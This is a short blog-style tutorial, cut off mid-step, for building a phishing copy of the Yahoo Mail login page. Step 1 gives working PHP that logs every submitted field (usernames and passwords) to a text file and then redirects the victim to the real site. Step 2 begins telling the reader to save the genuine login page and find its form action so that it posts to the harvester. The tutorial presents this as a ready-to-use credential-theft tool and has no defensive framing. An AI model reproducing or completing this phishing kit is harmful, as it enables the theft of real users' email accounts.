Step 1:
First of all open notepad and paste the following code:
header("Location: http://www.yahoomail.com");
$handle = fopen("passes.txt", "a");
foreach($_GET as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
And save this file as xtreme.php
Step 2:
Tip: use opera browser for best results.
1.Goto your browser open www.yahoomail.com.
2.Now save this yahoomail page on the desktop.
3.Open this saved page with notepad or wordpad.
Now keep your eyes open for the next step...;)
4.Press ctrl+f and find the word "action"(ofcourse without double quotes).
5.Select the following code

No comments:
Post a Comment